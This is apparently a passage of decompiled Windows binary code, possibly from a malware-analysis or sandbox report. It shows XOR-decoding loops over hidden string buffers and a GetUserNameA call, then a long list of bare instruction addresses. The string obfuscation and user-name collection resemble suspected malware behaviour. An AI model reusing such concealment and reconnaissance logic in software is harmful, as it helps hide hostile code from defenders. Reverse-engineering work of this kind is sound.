															 *(_t1151 + 0x43cf9c) =  *(_t1151 + 0x43cf9c) ^ 0x0000002e;
															_t1151 = _t1151 + 1;
															__eflags = _t1151 - 0xf;
														} while (_t1151 < 0xf);
														goto L129;
													}
												} else {
													_t1158 = 0;
													__eflags = 0;
													do {
														 *(_t1158 + 0x43cdec) =  *(_t1158 + 0x43cdec) ^ 0x0000002e;
														_t1158 = _t1158 + 1;
														__eflags = _t1158 - 0xe;
													} while (_t1158 < 0xe);
													goto L121;
												}
											}
											goto L97;
										}
										_t1172 = _t1281[1] & 0x000000ff;
										__eflags = _t1172 - 0x68;
										if(_t1172 != 0x68) {
											goto L95;
										}
										_t1172 = _t1281[2] & 0x000000ff;
										__eflags = _t1172 - 0x6b;
										if(_t1172 != 0x6b) {
											goto L95;
										}
										_t1173 = 0;
										goto L96;
									}
								}
								_t1175 = _t1577 - _t1486;
								__eflags = _t1175 - _t1245;
								_t1248 =  <  ? _t1175 : _t1245;
								__eflags =  *((intOrPtr*)(_t1587 + 0x14)) - 0x10;
								if( *((intOrPtr*)(_t1587 + 0x14)) >= 0x10) {
									_t1587 =  *_t1587;
								}
								_t1581 = _t1577 - _t1248;
								 *_v12 = _t1581;
								__eflags = _t1581 - _t1486 + 1;
								_t754 = E0040ECB0(_t1587 + _t1486, _t1587 + _t1486 + _t1248, _t1581 - _t1486 + 1);
							}
							return _t754;
						} else {
							goto L12;
						}
					}
				}
				L380:
				L6:
				_t708 =  *_t1250;
				_t1250 =  &(_t1250[1]);
				if(_t708 != 0) {
					goto L6;
				} else {
					_push(_t1250 - _t1470);
					E00402030( &_v348, 0x43ce80);
					_t19 =  &_v296; // 0x47434a4f
					_v8 = 1;
					_t1575 = GetUserNameA;
					_v296 = 0x101;
					GetUserNameA( &_v288, _t19);
					_t1253 =  &_v288;
					_v372 = 0;
					_v356 = 0;
					_t1471 = _t1253 + 1;
					_v352 = 0xf;
				}
				goto L8;
			}

0x00404fb0
0x00404fb3
0x00404fb5
0x00404fc0
0x00404fc1
0x00404fc7
0x00404fcc
0x00404fce
0x00404fd4
0x00404fd8
0x00404fde
0x00404fe8
0x00404ff2
0x00404ffc
0x00405003
0x00405010
0x0040501a
0x00405023
0x00405025
0x00405030
0x00405037
0x0040503c
0x0040503f
0x00405046
0x00405048
0x0040504e
0x0040505f
0x00405065
0x0040506f
0x00405074
0x00405074
0x00405046
0x00405077
0x0040507e
0x00405080
0x00405087
0x0040508e
0x00405095
0x0040509c
0x004050a5
0x004050a5
0x004050aa
0x004050af
0x004050b9
0x004050c3
0x004050cd
0x004050d4
0x004050d4
0x004050d4
0x00405140
0x00405140
0x00405140
0x00405142
0x00405143
0x0040514f
0x00405157
0x00405162
0x00405168
0x0040516d
0x00405173
0x00405178
0x004051a9
0x004051a9
0x004051ad
0x004051b6
0x004051e7
0x004051e9
0x0040578d
0x0040578d
0x00000000
0x004051ef
0x004051ef
0x004051f6
0x00405206
0x0040520d
0x00405212
0x00405215
0x0040521c
0x0040521e
0x00405229
0x0040522e
0x00405234
0x0040523e
0x00405243
0x00405243
0x0040521c
0x00405246
0x0040524d
0x0040524f
0x00405255
0x0040525b
0x00405261
0x00405269
0x00405269
0x0040526e
0x00405273
0x0040527d
0x00405287
0x00405291
0x00405298
0x00405298
0x00405298
0x00405300
0x00405300
0x00405300
0x00405302
0x00405303
0x0040530f
0x00405317
0x00405322
0x00405328
0x0040532d
0x00405333
0x00405338
0x00405369
0x00405369
0x0040536d
0x00405376
0x004053a7
0x004053a9
0x00000000
0x004053af
0x004053af
0x004053b4
0x004053be
0x004053c8
0x004053d7
0x004053de
0x004053e3
0x004053e6
0x004053ed
0x004053ef
0x00405403
0x0040540b
0x00405411
0x0040541b
0x00405420
0x00405420
0x004053ed
0x00405423
0x0040542a
0x0040542c
0x00405433
0x0040543a
0x00405441
0x00405448
0x0040544f
0x00405456
0x0040545d
0x00405464
0x0040546d
0x0040546d
0x00405472
0x00405477
0x00405481
0x0040548b
0x00405495
0x0040549c
0x0040549c
0x0040549c
0x00405500
0x00405500
0x00405500
0x00405502
0x00405503
0x0040550f
0x00405517
0x00405528
0x0040552d
0x00405533
0x00405538
0x00405569
0x00405569
0x0040556d
0x00405576
0x004055a7
0x004055a9
0x00000000
0x004055af
0x004055c2
0x004055c8
0x004055ce
0x004055d1
0x004055d1
0x004055d3
0x004055d4
0x004055e0
0x004055e8
0x004055f9
0x004055fe
0x00405603
0x00405609
0x00405610
0x0040561c
0x00405621
0x00405626
0x00000000
0x00000000
0x00405638
0x0040563d
0x00405642
0x00405654
0x00405659
0x0040565e
0x00405670
0x00405675
0x0040567a
0x00405680
0x00405686
0x00405690
0x00405690
0x00405692
0x00405693
0x00405697
0x00405699
0x0040569d
0x004056a0
0x004056ae
0x004056b5
0x004056b8
0x004056b9
0x004056a0
0x004056c9
0x004056ce
0x004056d3
0x004056e1
0x004056e6
0x004056eb
0x004056f2
0x00405707
0x0040570d
0x00405713
0x00405716
0x00405716
0x00405718
0x00405719
0x00405725
0x0040572d
0x0040573e
0x00405743
0x00405748
0x00000000
0x00000000
0x00405748
0x004056eb
0x004056d3
0x0040567a
0x0040565e
0x00000000
0x00405642
0x00405610
0x0040574e
0x0040574e
0x00405754
0x0040575e
0x00405794
0x00405799
0x004057a1
0x004057a2
0x004057a3
0x004057b1
0x00405760
0x00405760
0x00405766
0x00405767
0x0040576f
0x00405781
0x00405781
0x00405783
0x00000000
0x00405771
0x00405771
0x00405774
0x0040577f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040577f
0x0040576f
0x0040575e
0x00405578
0x00405578
0x0040557e
0x0040557f
0x00405587
0x0040559d
0x0040559d
0x0040559f
0x004055a4
0x00000000
0x00405589
0x00405589
0x0040558c
0x00405597
0x00000000
0x00000000
0x00000000
0x00000000
0x00405597
0x00405587
0x0040553a
0x0040553a
0x00405540
0x00405541
0x00405549
0x0040555f
0x0040555f
0x00405561
0x00405566
0x00000000
0x0040554b
0x0040554b
0x0040554e
0x00405559
0x00000000
0x00000000
0x00000000
0x00000000
0x00405559
0x00405549
0x00000000
0x004054a0
0x004054a0
0x004054a2
0x004054a5
0x00000000
0x004054a7
0x004054a9
0x004054b5
0x004054ba
0x004054c0
0x004054cb
0x004054d6
0x004054d8
0x004054de
0x004054e8
0x004054f2
0x004054f5
0x004054f5
0x00000000
0x004054a5
0x00405378
0x00405378
0x0040537e
0x0040537f
0x00405387
0x0040539d
0x0040539d
0x0040539f
0x004053a4
0x00000000
0x00405389
0x00405389
0x0040538c
0x00405397
0x00000000
0x00000000
0x00000000
0x00000000
0x00405397
0x00405387
0x0040533a
0x0040533a
0x00405340
0x00405341
0x00405349
0x0040535f
0x0040535f
0x00405361
0x00405366
0x00000000
0x0040534b
0x0040534b
0x0040534e
0x00405359
0x00000000
0x00000000
0x00000000
0x00000000
0x00405359
0x00405349
0x00000000
0x004052a0
0x004052a0
0x004052a2
0x004052a5
0x00000000
0x004052a7
0x004052a9
0x004052b5
0x004052ba
0x004052c0
0x004052cb
0x004052d6
0x004052d8
0x004052de
0x004052e8
0x004052f2
0x004052f5
0x004052f5
0x00000000
0x004052a5
0x004051b8
0x004051b8
0x004051be
0x004051bf
0x004051c7
0x004051dd
0x004051dd
0x004051df
0x004051e4
0x00000000
0x004051c9
0x004051c9
0x004051cc
0x004051d7
0x00000000
0x00000000
0x00000000
0x00000000
0x004051d7
0x004051c7
0x0040517a
0x0040517a
0x00405180
0x00405181
0x00405189
0x0040519f
0x0040519f
0x004051a1
0x004051a6
0x00000000
0x0040518b
0x0040518b
0x0040518e
0x00405199
0x004057b4
0x004057b4
0x004057b9
0x004057ba
0x004057bb
0x004057bc
0x004057bd
0x004057be
0x004057bf
0x004057c0
0x004057c1
0x004057c3
0x004057c4
0x004057c8
0x004057ca
0x004057cb
0x004057cc
0x004057cd
0x004057cf
0x004057d1
0x004057d1
0x004057d3
0x004057d7
0x004057d9
0x004057d9
0x004057db
0x004057de
0x004057e1
0x004057e5
0x004057eb
0x004057f0
0x004057f2
0x004057f5
0x004057f8
0x004057fa
0x004057fc
0x00405831
0x00405836
0x00405837
0x00405838
0x00405839
0x0040583a
0x0040583b
0x0040583c
0x0040583d
0x0040583e
0x0040583f
0x00405840
0x00405841
0x00405849
0x0040584c
0x00405850
0x00405856
0x00405858
0x00405863
0x00405864
0x0040586b
0x00405870
0x00405872
0x00405875
0x00405876
0x00405877
0x0040587b
0x00405883
0x00405893
0x00405898
0x0040589e
0x004058a1
0x004058a4
0x004058a8
0x004058af
0x004058b2
0x004058b5
0x004058db
0x004058db
0x004058e5
0x004058e8
0x004058eb
0x00000000
0x00000000
0x004058ed
0x004058ef
0x004058f4
0x004058f6
0x004058fe
0x00405900
0x0040591e
0x0040591e
0x00405920
0x00405920
0x00405923
0x00405923
0x00405925
0x00000000
0x00000000
0x00000000
0x00405925
0x00405902
0x00405905
0x00405908
0x00000000
0x00000000
0x0040590a
0x0040590d
0x00405910
0x00000000
0x00000000
0x00405912
0x00405915
0x00405918
0x00000000
0x00000000
0x0040591a
0x00000000
0x0040591a
0x004058f8
0x004058fa
0x00000000
0x004058b7
0x004058b7
0x004058ba
0x004058bc
0x004058d2
0x004058d2
0x004058d4
0x004058d4
0x004058d7
0x004058d7
0x004058d9
0x00405927
0x0040592e
0x00405933
0x00405936
0x00405941
0x00405948
0x0040594d
0x0040595c
0x00405962
0x0040596d
0x00405975
0x00405977
0x0040597c
0x00405982
0x00405989
0x0040598e
0x00405991
0x00405998
0x0040599a
0x004059a6
0x004059ad
0x004059ba
0x004059bf
0x004059bf
0x00405998
0x004059c2
0x004059c9
0x004059cb
0x004059d2
0x004059d9
0x004059dd
0x004059dd
0x004059f0
0x004059f5
0x004059ff
0x00405a09
0x00405a13
0x00405a1a
0x00405a1a
0x00405a20
0x00405a20
0x00405a22
0x00405a23
0x00405a23
0x00405a29
0x00405a35
0x00405a3a
0x00405a3e
0x00405a43
0x00405a4d
0x00405a57
0x00405a61
0x00405a6a
0x00405a70
0x00405a77
0x00405a7c
0x00405a7f
0x00405a86
0x00405a8e
0x00405a96
0x00405aa7
0x00405aaf
0x00405ab5
0x00405ac2
0x00405ac7
0x00405ac7
0x00405a86
0x00405aca
0x00405ad1
0x00405ae2
0x00405ae2
0x00405ae7
0x00405af1
0x00405afb
0x00405b05
0x00405b0c
0x00405b0c
0x00405b10
0x00405b10
0x00405b12
0x00405b13
0x00405b13
0x00405b19
0x00405b25
0x00405b2a
0x00405b2e
0x00405b33
0x00405b3d
0x00405b47
0x00405b51
0x00405b5a
0x00405b61
0x00405b67
0x00405b6e
0x00405b73
0x00405b76
0x00405b7d
0x00405b85
0x00405b8d
0x00405b99
0x00405baa
0x00405bb2
0x00405bb7
0x00405bc4
0x00405bc9
0x00405bc9
0x00405b7d
0x00405bcc
0x00405bd3
0x00405bed
0x00405bed
0x00405bf2
0x00405bfc
0x00405c06
0x00405c10
0x00405c17
0x00405c17
0x00405c1a
0x00405c20
0x00405c20
0x00405c22
0x00405c23
0x00405c23
0x00405c29
0x00405c35
0x00405c3a
0x00405c3e
0x00405c43
0x00405c4d
0x00405c57
0x00405c60
0x00405c66
0x00405c6d
0x00405c72
0x00405c75
0x00405c7c
0x00405c7e
0x00405c8c
0x00405c98
0x00405ca0
0x00405ca8
0x00405cae
0x00405cbb
0x00405cc0
0x00405cc0
0x00405c7c
0x00405cc3
0x00405cca
0x00405cfd
0x00405cfd
0x00405d02
0x00405d0c
0x00405d16
0x00405d20
0x00405d27
0x00405d27
0x00405d2a
0x00405d30
0x00405d30
0x00405d32
0x00405d33
0x00405d33
0x00405d39
0x00405d45
0x00405d4a
0x00405d54
0x00405d56
0x00405d65
0x00405d6f
0x00405d79
0x00405d80
0x00405d8b
0x00405d92
0x00405d97
0x00405d9b
0x00405da1
0x00405da4
0x00405dd5
0x00405dd5
0x00405dd7
0x00405dec
0x00405df6
0x00405e00
0x00405e07
0x00405e12
0x00405e16
0x00405e19
0x00405e1e
0x00405e22
0x00405e28
0x00405e2b
0x00405e5c
0x00405e61
0x00405e67
0x00405e6c
0x00405e76
0x00405e7c
0x00405e86
0x00405e90
0x00405e97
0x00405ea1
0x00405eab
0x00405eb5
0x00405ebc
0x00405ec0
0x00405ec5
0x00405ecf
0x00405ed5
0x00405edc
0x00405ee1
0x00405ee4
0x00405eeb
0x00405ef8
0x00405efd
0x00405f0a
0x00405f0f
0x00405f0f
0x00405eeb
0x00405f12
0x00405f17
0x00405f19
0x00405f1b
0x00405f22
0x00405f29
0x00405f30
0x00405f30
0x00405f32
0x00405f32
0x00405f37
0x00405f3c
0x00405f46
0x00405f50
0x00405f60
0x00405f60
0x00405f62
0x00405f63
0x00405f63
0x00405f69
0x00405f6f
0x00405f75
0x00405f7a
0x00405f81
0x00405f82
0x00405f85
0x00405f8a
0x00405f90
0x00405f96
0x00405f99
0x00405fd0
0x00405fd0
0x00405fd2
0x00406497
0x0040649c
0x004064a5
0x004064ac
0x004064b2
0x004064b9
0x004064be
0x004064c1
0x004064c8
0x004064d1
0x004064e2
0x004064e7
0x004064f4
0x004064f9
0x004064f9
0x004064c8
0x004064fc
0x00406501
0x00406503
0x00406505
0x0040650c
0x00406513
0x00406513
0x00406515
0x00406515
0x0040651a
0x0040651f
0x00406529
0x00406533
0x00406540
0x00406540
0x00406542
0x00406543
0x00406543
0x00406549
0x0040654f
0x00406555
0x0040655a
0x00406561
0x00406562
0x00406565
0x0040656a
0x00406570
0x00406576
0x00406579
0x004065aa
0x004065aa
0x004065b1
0x004065b7
0x00406777
0x00406780
0x00406787
0x0040678d
0x00406794
0x00406799
0x0040679c
0x004067a3
0x004067ac
0x004067bd
0x004067c2
0x004067cf
0x004067d4
0x004067d4
0x004067a3
0x004067d7
0x004067dc
0x004067de
0x004067e0
0x004067e7
0x004067ee
0x004067ee
0x004067f0
0x004067f0
0x004067f5
0x004067fa
0x00406804
0x0040680e
0x00406820
0x00406820
0x00406822
0x00406823
0x00406823
0x00406829
0x0040682f
0x00406835
0x0040683a
0x00406841
0x00406842
0x00406845
0x0040684a
0x00406850
0x00406856
0x00406859
0x00406890
0x00406890
0x00406892
0x00406a7b
0x00406a7b
0x00406a82
0x00406a84
0x00406a8b
0x00406a91
0x00406a91
0x00406a96
0x00406a9d
0x00406a9f
0x00406aa6
0x00406aac
0x00406aac
0x00406abf
0x00406ac7
0x00406ad1
0x00406ae8
0x00406af7
0x00406afc
0x00406aff
0x00406b09
0x00406b13
0x00406b1d
0x00406b27
0x00406b2b
0x00406b30
0x00406b3a
0x00406b44
0x00406b4e
0x00406b54
0x00406b5b
0x00406b60
0x00406b63
0x00406b6a
0x00406b6c
0x00406b7f
0x00406b87
0x00406b8c
0x00406b99
0x00406b9e
0x00406b9e
0x00406b6a
0x00406ba1
0x00406ba8
0x00406bbd
0x00406bbd
0x00406bc2
0x00406bcc
0x00406bd6
0x00406be0
0x00406bea
0x00406bf0
0x00406bf0
0x00406bf2
0x00406bf3
0x00406bf3
0x00406bf9
0x00406c05
0x00406c0a
0x00406c0e
0x00406c13
0x00406c1d
0x00406c27
0x00406c2e
0x00406c34
0x00406c3b
0x00406c40
0x00406c43
0x00406c4a
0x00406c4c
0x00406c5f
0x00406c67
0x00406c6c
0x00406c79
0x00406c7e
0x00406c7e
0x00406c4a
0x00406c81
0x00406c86
0x00406c88
0x00406c8a
0x00406c91
0x00406c98
0x00406c9f
0x00406ca6
0x00406cad
0x00406cb4
0x00406cbb
0x00406cc2
0x00406cc2
0x00406cc4
0x00406cc4
0x00406cc9
0x00406cce
0x00406cd8
0x00406ce2
0x00406cec
0x00406cf6
0x00406cf6
0x00406cf8
0x00406cf9
0x00406cf9
0x00406cff
0x00406d0b
0x00406d10
0x00406d14
0x00406d19
0x00406d20
0x00406d26
0x00406d2d
0x00406d32
0x00406d35
0x00406d3c
0x00406d3e
0x00406d50
0x00406d57
0x00406d5c
0x00406d69
0x00406d6e
0x00406d6e
0x00406d3c
0x00406d71
0x00406d76
0x00406d78
0x00406d7a
0x00406d83
0x00406d8a
0x00406d8e
0x00406d93
0x00406d93
0x00406d9a
0x00406d9f
0x00406da9
0x00406db3
0x00406dbd
0x00406dc7
0x00406dc7
0x00406dc9
0x00406dca
0x00406dca
0x00406dd0
0x00406ddc
0x00406de1
0x00406deb
0x00406df8
0x00406e07
0x00406e0c
0x00406e16
0x00406e20
0x00406e2a
0x00406e2d
0x00406e34
0x00406e39
0x00406e41
0x00406e48
0x00406e4f
0x00406e55
0x00406e66
0x00406e74
0x00406e78
0x00406e86
0x00406e91
0x00406ea2
0x00406eb0
0x00406eb4
0x00406ec2
0x00406eca
0x00406edb
0x00406ee0
0x00406ee3
0x00406ee7
0x00406eed
0x00406ef0
0x00406f21
0x00406f21
0x00406f2b
0x00406f35
0x00406f3c
0x00406f40
0x00406f46
0x00406f49
0x00406f7a
0x00406f7a
0x00406f84
0x00406f8e
0x00406f95
0x00406f99
0x00406f9f
0x00406fa2
0x00406fd3
0x00406fd3
0x00406fdd
0x00406fe7
0x00406fee
0x00406ff2
0x00406ff8
0x00406ffb
0x0040702c
0x0040702c
0x00407036
0x00407040
0x00407047
0x0040704b
0x00407051
0x00407054
0x00407085
0x00407085
0x0040708f
0x00407099
0x004070a0
0x004070a4
0x004070aa
0x004070ad
0x004070de
0x004070de
0x004070e8
0x004070f2
0x004070f9
0x004070fd
0x00407103
0x00407106
0x00407133
0x00407133
0x00407137
0x0040713d
0x00407140
0x00407172
0x00407172
0x0040717f
0x00407185
0x0040718c
0x00407196
0x00407198
0x0040719b
0x004071a0
0x004071a3
0x004071a3
0x004071b4
0x004071b9
0x004071bb
0x00000000
0x00000000
0x004071c9
0x004071cf
0x004071d5
0x004071d8
0x004071de
0x004071e0
0x004071ea
0x004071f0
0x004071f3
0x004071f3
0x004071f5
0x004071f6
0x004071f6
0x004071fc
0x00407204
0x00407209
0x00407213
0x00407219
0x0040721c
0x00407222
0x00407228
0x0040722f
0x00407232
0x00407235
0x0040724f
0x0040724f
0x0040725c
0x0040725f
0x00407262
0x00407278
0x00407278
0x0040727c
0x0040727f
0x00000000
0x00000000
0x00407281
0x00407282
0x00407284
0x0040728a
0x004072a0
0x004072a0
0x004072a2
0x004072a7
0x00000000
0x004072a7
0x0040728c
0x0040728f
0x00407297
0x0040729a
0x00407163
0x00407163
0x00407168
0x00407168
0x0040716a
0x0040716f
0x00000000
0x0040716f
0x00000000
0x0040729a
0x00407264
0x00407267
0x00407269
0x0040726f
0x00407271
0x00407271
0x0040726b
0x0040726b
0x0040726b
0x00407274
0x00407276
0x004072bc
0x004072c7
0x004072cc
0x004072cf
0x004072de
0x004072e3
0x004072e7
0x004072fa
0x00407300
0x00407306
0x00407310
0x00407315
0x0040731a
0x0040732a
0x00407335
0x00407337
0x00407342
0x00407346
0x0040734b
0x0040734d
0x00000000
0x00000000
0x00407361
0x0040736c
0x00407371
0x00407374
0x00000000
0x00000000
0x00407376
0x00407379
0x00407387
0x00407390
0x00407397
0x0040739c
0x004073a0
0x004073a6
0x0040750c
0x0040751a
0x0040751f
0x0040752e
0x00407541
0x00407546
0x0040754c
0x00407551
0x00407555
0x0040755a
0x00407560
0x00407560
0x00407565
0x00407571
0x0040757d
0x00407587
0x0040758c
0x00407596
0x004075a1
0x004075ac
0x004075b0
0x004075b7
0x004075c3
0x004075d0
0x004075d2
0x004075d4
0x004075d4
0x004075e9
0x004075ee
0x00407605
0x00407611
0x0040761b
0x00407629
0x0040762d
0x00407645
0x0040764b
0x00407651
0x0040765b
0x00407660
0x00407665
0x00407675
0x00407680
0x00407682
0x0040768d
0x00407691
0x00407696
0x00407698
0x004076a0
0x004076a5
0x004076a8
0x004076bc
0x004076bc
0x004076a8
0x004076cf
0x004076d4
0x004076eb
0x004076f7
0x00407701
0x0040770f
0x00407713
0x0040772b
0x00407737
0x00407741
0x00407746
0x0040774b
0x0040775b
0x00407766
0x00407768
0x00407773
0x00407777
0x0040777c
0x0040777e
0x0040778f
0x00407792
0x004077aa
0x004077c2
0x004077cd
0x004077e7
0x004077e9
0x004077f3
0x004077f8
0x00407801
0x0040780c
0x00407810
0x0040781f
0x00407836
0x0040783c
0x0040784b
0x00407851
0x00407853
0x0040786c
0x00407878
0x00407882
0x00407890
0x00407894
0x004078a0
0x004078ac
0x004078b8
0x004078ce
0x004078d3
0x004078dc
0x004078dc
0x004078e7
0x004078eb
0x004078eb
0x00407792
0x004078f0
0x004078f0
0x004078f5
0x004078f5
0x004078f7
0x004078fe
0x00407900
0x0040790a
0x00407910
0x00407928
0x0040792a
0x00407930
0x00407933
0x00407935
0x0040793b
0x0040793d
0x0040793f
0x00407944
0x0040794b
0x0040794b
0x00407951
0x00407954
0x00407956
0x0040795c
0x00407963
0x00407963
0x00407969
0x0040796c
0x0040797b
0x00407981
0x00407984
0x00000000
0x00000000
0x00000000
0x0040796e
0x0040796e
0x00407971
0x00407973
0x00407973
0x00407986
0x00407986
0x00407988
0x00000000
0x00000000
0x0040798a
0x0040798d
0x004079c1
0x004079cc
0x00000000
0x004079cc
0x0040798d
0x0040798f
0x0040798f
0x0040799a
0x0040799d
0x004079a3
0x004079a9
0x004079af
0x004079af
0x00407506
0x00407506
0x00000000
0x00407506
0x004073ac
0x004073b2
0x00000000
0x00000000
0x004073b8
0x004073bf
0x00000000
0x00000000
0x004073c5
0x004073d0
0x004073d1
0x004073ea
0x004073f0
0x004073f6
0x00407400
0x00407405
0x0040740a
0x0040741a
0x00407427
0x00407432
0x00407436
0x0040743b
0x0040743d
0x00000000
0x00000000
0x0040744e
0x00407450
0x00407456
0x00407459
0x00000000
0x00000000
0x0040746d
0x00407479
0x00407483
0x004074a0
0x004074a1
0x004074a6
0x004074a9
0x004074b8
0x004074c5
0x004074d6
0x004074e0
0x004074e5
0x004074e8
0x004074ea
0x004074f1
0x00000000
0x00000000
0x004074f7
0x004074f7
0x004074fd
0x004074fd
0x00000000
0x004073d0
0x0040737b
0x00407380
0x00407380
0x00000000
0x00000000
0x00000000
0x00407276
0x00407237
0x0040723a
0x0040723c
0x00407242
0x00407244
0x00407244
0x0040723e
0x0040723e
0x0040723e
0x00407247
0x00407249
0x00000000
0x00000000
0x00000000
0x00000000
0x004072aa
0x004072af
0x004072af
0x00407172
0x00407142
0x00407148
0x00407149
0x0040714b
0x00407151
0x00000000
0x00000000
0x00407153
0x00407156
0x0040715e
0x00407161
0x00000000
0x00000000
0x00000000
0x00407161
0x00407108
0x0040710e
0x0040710f
0x00407111
0x00407117
0x00407129
0x00407129
0x0040712b
0x00407130
0x00000000
0x00407130
0x00407119
0x0040711c
0x00407124
0x00407127
0x00000000
0x00000000
0x00000000
0x00407127
0x004070af
0x004070b5
0x004070b6
0x004070b8
0x004070be
0x004070d4
0x004070d4
0x004070d6
0x004070db
0x00000000
0x004070db
0x004070c0
0x004070c3
0x004070cb
0x004070ce
0x00000000
0x00000000
0x00000000
0x004070ce
0x00407056
0x0040705c
0x0040705d
0x0040705f
0x00407065
0x0040707b
0x0040707b
0x0040707d
0x00407082
0x00000000
0x00407082
0x00407067
0x0040706a
0x00407072
0x00407075
0x00000000
0x00000000
0x00000000
0x00407075
0x00406ffd
0x00407003
0x00407004
0x00407006
0x0040700c
0x00407022
0x00407022
0x00407024
0x00407029
0x00000000
0x00407029
0x0040700e
0x00407011
0x00407019
0x0040701c
0x00000000
0x00000000
0x00000000
0x0040701c
0x00406fa4
0x00406faa
0x00406fab
0x00406fad
0x00406fb3
0x00406fc9
0x00406fc9
0x00406fcb
0x00406fd0
0x00000000
0x00406fd0
0x00406fb5
0x00406fb8
0x00406fc0
0x00406fc3
0x00000000
0x00000000
0x00000000
0x00406fc3
0x00406f4b
0x00406f51
0x00406f52
0x00406f54
0x00406f5a
0x00406f70
0x00406f70
0x00406f72
0x00406f77
0x00000000
0x00406f77
0x00406f5c
0x00406f5f
0x00406f67
0x00406f6a
0x00000000
0x00000000
0x00000000
0x00406f6a
0x00406ef2
0x00406ef8
0x00406ef9
0x00406efb
0x00406f01
0x00406f17
0x00406f17
0x00406f19
0x00406f1e
0x00000000
0x00406f1e
0x00406f03
0x00406f06
0x00406f0e
0x00406f11
0x00000000
0x00000000
0x00000000
0x00406baa
0x00406baa
0x00406baa
0x00406bb0
0x00406bb0
0x00406bb7
0x00406bb8
0x00406bb8
0x00000000
0x00406bb0
0x00406ba8
0x00406898
0x0040689d
0x004068a6
0x004068ac
0x004068b3
0x004068b8
0x004068bb
0x004068c2
0x004068d0
0x004068d6
0x004068e3
0x004068e8
0x004068e8
0x004068c2
0x004068eb
0x004068f0
0x004068f2
0x004068f4
0x004068fb
0x004068fb
0x004068fd
0x004068fd
0x00406902
0x00406907
0x00406911
0x0040691b
0x00406928
0x00406928
0x0040692a
0x0040692b
0x0040692b
0x00406931
0x00406937
0x0040693d
0x00406942
0x00406948
0x0040694b
0x0040697c
0x0040697c
0x00406983
0x00406988
0x00406991
0x00406998
0x0040699f
0x004069a7
0x004069af
0x004069b5
0x004069bc
0x004069c1
0x004069c4
0x004069cb
0x004069d4
0x004069e5
0x004069ea
0x004069f7
0x004069fc
0x004069fc
0x004069cb
0x004069ff
0x00406a04
0x00406a06
0x00406a08
0x00406a0f
0x00406a16
0x00406a16
0x00406a18
0x00406a18
0x00406a1d
0x00406a22
0x00406a2c
0x00406a36
0x00406a43
0x00406a43
0x00406a45
0x00406a46
0x00406a46
0x00406a4a
0x00406a4a
0x00406a4c
0x00406a4d
0x00406a52
0x00406a52
0x00406a58
0x00406a5d
0x00406a64
0x00406a6b
0x00406a73
0x00000000
0x00406a73
0x0040694d
0x00406953
0x00406954
0x00406956
0x0040695c
0x00406972
0x00406972
0x00406974
0x00406979
0x00000000
0x00406979
0x0040695e
0x00406961
0x00406969
0x0040696c
0x00000000
0x00000000
0x00000000
0x0040696c
0x0040685b
0x00406861
0x00406862
0x00406864
0x0040686a
0x00406880
0x00406880
0x00406882
0x00406887
0x0040688d
0x00000000
0x0040688d
0x0040686c
0x0040686f
0x00406877
0x0040687a
0x00000000
0x00000000
0x00000000
0x0040687a
0x004065bd
0x004065c6
0x004065cc
0x004065d3
0x004065d8
0x004065db
0x004065e2
0x004065f0
0x004065f6
0x00406603
0x00406608
0x00406608
0x004065e2
0x0040660b
0x00406610
0x00406612
0x00406614
0x0040661b
0x0040661b
0x0040661d
0x0040661d
0x00406622
0x00406627
0x00406631
0x0040663b
0x00406648
0x00406648
0x0040664a
0x0040664b
0x0040664b
0x00406651
0x00406657
0x0040665d
0x00406662
0x00406668
0x0040666b
0x0040669c
0x0040669c
0x004066a3
0x004066a8
0x004066b1
0x004066b8
0x004066bf
0x004066c7
0x004066cf
0x004066d5
0x004066dc
0x004066e1
0x004066e4
0x004066eb
0x004066f4
0x00406705
0x0040670a
0x00406717
0x0040671c
0x0040671c
0x004066eb
0x0040671f
0x00406724
0x00406726
0x00406728
0x0040672f
0x00406736
0x00406736
0x00406738
0x00406738
0x0040673d
0x00406742
0x0040674c
0x00406756
0x00406763
0x00406763
0x00406765
0x00406766
0x00406766
0x0040676c
0x0040676d
0x00000000
0x0040676d
0x0040666d
0x00406673
0x00406674
0x00406676
0x0040667c
0x00406692
0x00406692
0x00406694
0x00406699
0x00000000
0x00406699
0x0040667e
0x00406681
0x00406689
0x0040668c
0x00000000
0x00000000
0x00000000
0x0040668c
0x0040657b
0x00406581
0x00406582
0x00406584
0x0040658a
0x004065a0
0x004065a0
0x004065a2
0x004065a7
0x00000000
0x004065a7
0x0040658c
0x0040658f
0x00406597
0x0040659a
0x00000000
0x00000000
0x00000000
0x0040659a
0x00405fd8
0x00405fe2
0x00405fe6
0x00405ff5
0x00405ffa
0x00405ffd
0x00406000
0x0040627b
0x0040627b
0x00406280
0x0040628a
0x00406293
0x0040629a
0x004062a0
0x004062a7
0x004062ac
0x004062af
0x004062b6
0x004062be
0x004062ca
0x004062db
0x004062e0
0x004062ed
0x004062f2
0x004062f2
0x004062b6
0x004062f5
0x004062fa
0x004062fc
0x004062fe
0x00406305
0x0040630c
0x00406313
0x0040631a
0x00406321
0x00406328
0x00406328
0x0040632a
0x0040632a
0x0040632f
0x00406334
0x0040633e
0x00406348
0x00406355
0x00406355
0x00406357
0x00406358
0x00406358
0x0040635e
0x0040636a
0x0040636f
0x00406376
0x0040637b
0x00406384
0x0040638b
0x00406393
0x0040639b
0x004063a1
0x004063a8
0x004063ad
0x004063b0
0x004063b7
0x004063c5
0x004063cb
0x004063d8
0x004063dd
0x004063dd
0x004063b7
0x004063e0
0x004063e5
0x004063e7
0x004063e9
0x004063f0
0x004063f0
0x004063f2
0x004063f2
0x004063f7
0x004063fc
0x00406406
0x00406410
0x00406420
0x00406420
0x00406422
0x00406423
0x00406423
0x00406429
0x0040642f
0x00406435
0x0040643a
0x00406440
0x00406443
0x00406474
0x00406474
0x0040647b
0x00406482
0x0040648a
0x00000000
0x0040648a
0x00406445
0x0040644b
0x0040644c
0x0040644e
0x00406454
0x0040646a
0x0040646a
0x0040646c
0x00406471
0x00000000
0x00406471
0x00406456
0x00406459
0x00406461
0x00406464
0x00000000
0x00000000
0x00000000
0x00406464
0x00406006
0x00406013
0x0040601f
0x00406024
0x00406027
0x0040602a
0x00000000
0x00000000
0x00406030
0x0040603d
0x00406049
0x0040604e
0x00406051
0x00406054
0x00000000
0x00000000
0x0040605a
0x0040605f
0x00406069
0x00406072
0x00406079
0x0040607f
0x00406086
0x0040608b
0x0040608e
0x00406095
0x0040609d
0x004060a9
0x004060ba
0x004060bf
0x004060cc
0x004060d1
0x004060d1
0x00406095
0x004060d4
0x004060d9
0x004060db
0x004060dd
0x004060e4
0x004060eb
0x004060f2
0x004060f9
0x00406100
0x00406107
0x00406107
